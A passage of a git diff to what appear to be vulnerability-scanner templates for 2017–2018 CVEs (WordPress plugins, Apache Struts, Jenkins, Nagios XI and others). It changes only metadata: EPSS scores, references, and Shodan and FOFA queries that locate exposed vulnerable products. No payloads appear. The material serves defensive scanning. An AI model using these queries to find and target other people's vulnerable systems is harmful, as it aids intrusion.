b/http/cves/2017/CVE-2017-18496.yaml index 6b6cb879c5..35fe3cb310 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: htaccess framework: wordpress - publicwww-query: "/wp-content/plugins/htaccess/" shodan-query: http.html:/wp-content/plugins/htaccess/ fofa-query: body=/wp-content/plugins/htaccess/ + publicwww-query: "/wp-content/plugins/htaccess/" tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 47d08c7d21..8d4a99c7c6 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: social_buttons_pack framework: wordpress - publicwww-query: "/wp-content/plugins/social-buttons-pack/" shodan-query: http.html:/wp-content/plugins/social-buttons-pack/ fofa-query: body=/wp-content/plugins/social-buttons-pack/ + publicwww-query: "/wp-content/plugins/social-buttons-pack/" tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 7af4ac0a0d..7d692fbf75 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: social_login framework: wordpress - publicwww-query: "/wp-content/plugins/social-login-bws/" shodan-query: http.html:/wp-content/plugins/social-login-bws/ fofa-query: body=/wp-content/plugins/social-login-bws/ + publicwww-query: "/wp-content/plugins/social-login-bws/" tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 702e3f5399..58762eefc6 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: subscriber framework: wordpress - publicwww-query: "/wp-content/plugins/subscriber/" shodan-query: http.html:/wp-content/plugins/subscriber/ fofa-query: body=/wp-content/plugins/subscriber/ + publicwww-query: "/wp-content/plugins/subscriber/" tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 58b79a5aef..8886a3dcd5 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: twitter_button framework: wordpress - publicwww-query: "/wp-content/plugins/twitter-plugin/" shodan-query: http.html:/wp-content/plugins/twitter-plugin/ fofa-query: body=/wp-content/plugins/twitter-plugin/ + publicwww-query: "/wp-content/plugins/twitter-plugin/" tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 3a88b0d928..636ef7d3ee 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: linkedin framework: wordpress - publicwww-query: "/wp-content/plugins/bws-linkedin/" shodan-query: http.html:/wp-content/plugins/bws-linkedin/ fofa-query: body=/wp-content/plugins/bws-linkedin/ + publicwww-query: "/wp-content/plugins/bws-linkedin/" tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index e73fe4cd1a..4fdcb69d18 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: pinterest framework: wordpress - publicwww-query: /wp-content/plugins/bws-pinterest/ shodan-query: http.html:/wp-content/plugins/bws-pinterest/ fofa-query: body=/wp-content/plugins/bws-pinterest/ + publicwww-query: /wp-content/plugins/bws-pinterest/ tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 460fc36583..9d289105ba 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: smtp framework: wordpress - publicwww-query: /wp-content/plugins/bws-smtp/ shodan-query: http.html:/wp-content/plugins/bws-smtp/ fofa-query: body=/wp-content/plugins/bws-smtp/ + publicwww-query: /wp-content/plugins/bws-smtp/ tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index f21ed85a11..a49da0c75b 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: pagination framework: wordpress - publicwww-query: "/wp-content/plugins/pagination/" shodan-query: http.html:/wp-content/plugins/pagination/ fofa-query: body=/wp-content/plugins/pagination/ + publicwww-query: "/wp-content/plugins/pagination/" tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss http: diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index fa245ea667..b6c6f6f9c0 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: pdf_\&_print framework: wordpress - publicwww-query: "/wp-content/plugins/pdf-print/" shodan-query: http.html:/wp-content/plugins/pdf-print/ fofa-query: body=/wp-content/plugins/pdf-print/ + publicwww-query: "/wp-content/plugins/pdf-print/" tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index bdf1d39088..1a2b06a0c6 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: promobar framework: wordpress - publicwww-query: /wp-content/plugins/promobar/ shodan-query: http.html:/wp-content/plugins/promobar/ fofa-query: body=/wp-content/plugins/promobar/ + publicwww-query: /wp-content/plugins/promobar/ tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 2986dfffc1..94ebe90e6e 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: rating framework: wordpress - publicwww-query: "/wp-content/plugins/rating-bws/" shodan-query: http.html:/wp-content/plugins/rating-bws/ fofa-query: body=/wp-content/plugins/rating-bws/ + publicwww-query: "/wp-content/plugins/rating-bws/" tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 19cb52f5d5..5817f23708 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: realty framework: wordpress - publicwww-query: /wp-content/plugins/realty/ shodan-query: http.html:/wp-content/plugins/realty/ fofa-query: body=/wp-content/plugins/realty/ + publicwww-query: /wp-content/plugins/realty/ tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 5c68ef701c..c616e93cc7 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: visitors_online framework: wordpress - publicwww-query: "/wp-content/plugins/visitors-online/" shodan-query: http.html:/wp-content/plugins/visitors-online/ fofa-query: body=/wp-content/plugins/visitors-online/ + publicwww-query: "/wp-content/plugins/visitors-online/" tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 0182d593bc..79165bcafe 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: zendesk_help_center framework: wordpress - publicwww-query: "/wp-content/plugins/zendesk-help-center/" shodan-query: http.html:/wp-content/plugins/zendesk-help-center/ fofa-query: body=/wp-content/plugins/zendesk-help-center/ + publicwww-query: "/wp-content/plugins/zendesk-help-center/" tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 417feb4dca..6404cd0920 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: google_analytics framework: wordpress - publicwww-query: "/wp-content/plugins/bws-google-analytics/" shodan-query: http.html:/wp-content/plugins/bws-google-analytics/ fofa-query: body=/wp-content/plugins/bws-google-analytics/ + publicwww-query: "/wp-content/plugins/bws-google-analytics/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 1e38c2e008..775237fe4d 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: google_maps framework: wordpress - publicwww-query: "/wp-content/plugins/bws-google-maps/" shodan-query: http.html:/wp-content/plugins/bws-google-maps/ fofa-query: body=/wp-content/plugins/bws-google-maps/ + publicwww-query: "/wp-content/plugins/bws-google-maps/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index fbd0973fd6..570d868792 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: testimonials framework: wordpress - publicwww-query: "/wp-content/plugins/bws-testimonials/" shodan-query: http.html:/wp-content/plugins/bws-testimonials/ fofa-query: body=/wp-content/plugins/bws-testimonials/ + publicwww-query: "/wp-content/plugins/bws-testimonials/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 8b35ceb57f..f57c3e4035 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: error_log_viewer framework: wordpress - publicwww-query: "/wp-content/plugins/error-log-viewer/" shodan-query: http.html:/wp-content/plugins/error-log-viewer/ fofa-query: body=/wp-content/plugins/error-log-viewer/ + publicwww-query: "/wp-content/plugins/error-log-viewer/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 519180be8c..045337c09f 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: sender framework: wordpress - publicwww-query: "/wp-content/plugins/sender/" shodan-query: http.html:/wp-content/plugins/sender/ fofa-query: body=/wp-content/plugins/sender/ + publicwww-query: "/wp-content/plugins/sender/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index d7dbdba507..17dfdf8400 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: updater framework: wordpress - publicwww-query: "/wp-content/plugins/updater/" shodan-query: http.html:/wp-content/plugins/updater/ fofa-query: body=/wp-content/plugins/updater/ + publicwww-query: "/wp-content/plugins/updater/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 806074a32d..ca26e14aab 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: user_role framework: wordpress - publicwww-query: "/wp-content/plugins/user-role/" shodan-query: http.html:/wp-content/plugins/user-role/ fofa-query: body=/wp-content/plugins/user-role/ + publicwww-query: "/wp-content/plugins/user-role/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 60c4d50b3c..5ff6843e4a 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -24,7 +24,7 @@ info: epss-percentile: 0.39752 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: designmodo product: qards framework: wordpress diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 9c37ceeee1..c54195e14d 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 501f03a2c3..b717a27875 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -15,13 +15,14 @@ info: - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - https://www.exploit-db.com/exploits/41205/ + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 - epss-percentile: 0.99914 + epss-percentile: 0.99921 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index fd2a9dce04..1697fe4b00 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -29,8 +29,15 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: html:"Apache Struts" - fofa-query: body="struts problem report" + shodan-query: + - html:"Apache Struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,kev,msf,struts,rce diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 2bc9106fca..77e5374c5a 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: intel product: active_management_technology_firmware - shodan-query: title:"Active Management Technology" + shodan-query: + - title:"Active Management Technology" + - http.title:"active management technology" fofa-query: title="active management technology" google-query: intitle:"active management technology" tags: cve2017,cve,amt,intel,tenable,kev diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 0dde2a8972..dbbb5b8d1c 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -13,19 +13,23 @@ info: - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - https://www.exploit-db.com/exploits/42934/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 epss-score: 0.97204 - epss-percentile: 0.99787 + epss-percentile: 0.99825 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: phpcollab product: phpcollab - shodan-query: http.title:"PhpCollab" + shodan-query: + - http.title:"PhpCollab" + - http.title:"phpcollab" fofa-query: title="phpcollab" google-query: intitle:"phpcollab" tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index ac61004431..e78e97079e 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -32,7 +32,9 @@ info: max-request: 5 vendor: mantisbt product: mantisbt - shodan-query: http.favicon.hash:662709064 + shodan-query: + - http.favicon.hash:662709064 + - cpe:"cpe:2.3:a:mantisbt:mantisbt" fofa-query: icon_hash=662709064 tags: cve,cve2017,mantisbt,unauth,edb diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 47974bab8f..81b9d7671d 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -23,7 +23,9 @@ info: max-request: 1 vendor: icewarp product: server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"gotify" fofa-query: title="gotify" google-query: intitle:"gotify" tags: cve,cve2017,xss,icewarp diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index d2bb37a789..ba79e02b15 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -21,16 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2017-8229 cwe-id: CWE-255 - epss-score: 0.89506 - epss-percentile: 0.98685 + epss-score: 0.93383 + epss-percentile: 0.99075 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: amcrest product: ipm-721s_firmware - shodan-query: html:"Amcrest" - fofa-query: "Amcrest" + shodan-query: + - html:"Amcrest" + - http.html:"amcrest" + fofa-query: + - "Amcrest" + - amcrest + - body="amcrest" tags: cve2017,cve,packetstorm,seclists,amcrest,iot http: diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 8e9d3f09cd..83e0ef0cc5 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -29,7 +29,11 @@ info: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.component:"Joomla" + shodan-query: + - http.component:"Joomla" + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve2017,cve,joomla,sqli variables: diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 758a65dd40..e98f690265 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - epss-percentile: 0.52791 + epss-percentile: 0.53673 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: raygun product: raygun4wp framework: wordpress tags: cve2017,cve,wordpress,xss,wp-plugin,raygun - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 42a93b198d..b3385320e0 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: odoo product: odoo - shodan-query: cpe:"cpe:2.3:a:odoo:odoo" + shodan-query: + - cpe:"cpe:2.3:a:odoo:odoo" + - http.title:"odoo" fofa-query: title="odoo" google-query: intitle:"odoo" tags: cve2017,cve,odoo,lfi diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 156f658c9b..d326ebaa1b 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: oauth - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2017,atlassian,jira,ssrf,oast http: diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index e14b2a5a9c..f919847fa7 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -29,8 +29,16 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: title:"Struts2 Showcase" - fofa-query: title="Struts2 Showcase" + shodan-query: + - title:"Struts2 Showcase" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - title="Struts2 Showcase" + - title="struts2 showcase" + - body="apache struts" + - body="struts problem report" google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,rce,struts,kev variables: diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index a1ac4bdffd..d34c4ab1e5 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts,kev diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 8b46d15dc0..87c54074ee 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 - epss-score: 0.97411 - epss-percentile: 0.99921 + epss-score: 0.97436 + epss-percentile: 0.99942 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index c3245382d1..00cb7da979 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01309 - epss-percentile: 0.8563 + epss-percentile: 0.85899 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 9f8cdce89d..d43d532004 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 - epss-score: 0.00598 - epss-percentile: 0.77958 + epss-score: 0.00422 + epss-percentile: 0.74167 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 276a69b40d..d256b42487 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" fofa-query: icon_hash=81586312 tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index f58ca72664..a7f345b608 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 - epss-percentile: 0.99203 + epss-percentile: 0.99346 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index 0a5d6fdb63..d8236014a2 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -26,8 +26,10 @@ info: max-request: 1 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:"-631559155" tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks http: diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 5aeda05166..7b20ad3267 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -14,13 +14,14 @@ info: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - https://www.zend.com/en/products/server/release-notes - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46318 + epss-score: 0.00106 + epss-percentile: 0.43069 cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index c9d9f40976..7133c31465 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -22,8 +22,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index 40290d66e0..e063b60ac9 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -23,8 +23,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + fofa-query: + - app="Nagios-XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2018,nagios,sqli variables: diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index 476167d0e2..ffdb3f89da 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -22,8 +22,11 @@ info: max-request: 1 vendor: nagios product: nagios_xi - fofa-query: app="Nagios-XI" shodan-query: http.title:"nagios xi" + 